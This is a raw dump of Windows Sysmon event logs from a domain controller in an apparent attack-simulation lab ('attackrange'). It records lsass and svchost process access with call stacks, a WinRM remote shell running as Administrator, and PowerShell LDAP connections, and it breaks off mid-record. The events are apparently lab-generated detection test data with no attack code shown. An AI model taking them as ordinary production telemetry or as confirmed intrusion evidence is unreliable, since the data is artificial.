15:52:07.182{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CA7-5FA1-9100-000000008801}4804C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003072Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.191{D28789B6-7CA7-5FA1-9100-000000008801}4804C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7CA7-5FA1-A343-060000000000}0x643a30HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003071Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.182{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003070Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.182{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003069Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.182{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003068Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.088{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003067Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.088{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003066Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.088{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003065Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.072{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003064Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.072{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003063Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.072{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000003062Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:04.719{D28789B6-7C9E-5FA1-8900-000000008801}5004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50315-false10.0.1.14win-dc-807.attackrange.local389ldap 354300x80000000000000003061Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:04.714{D28789B6-7C9E-5FA1-8900-000000008801}5004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50314-false10.0.1.14win-dc-807.attackrange.local389ldap 354300x80000000000000003060Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:04.701{D28789B6-7C9E-5FA1-8900-000000008801}5004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50313-false10.0.1.14win-dc-807.attackrange.local389ldap 10341000x80000000000000003261Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.936{D28789B6-7CA7-5FA1-9200-000000008801}5048668C:\Windows\system32\conhost.exe{D28789B6-7CA8-5FA1-9C00-000000008801}4444C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003260Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.936{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003259Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.936{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003258Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.936{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003257Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.936{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003256Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.936{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003255Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.936{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003254Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.936{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003253Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.936{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003252Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.936{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003251Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.936{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CA8-5FA1-9C00-000000008801}4444C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003250Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.936{D28789B6-7CA8-5FA1-9B00-000000008801}46441744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CA8-5FA1-9C00-000000008801}4444C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31d4331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\W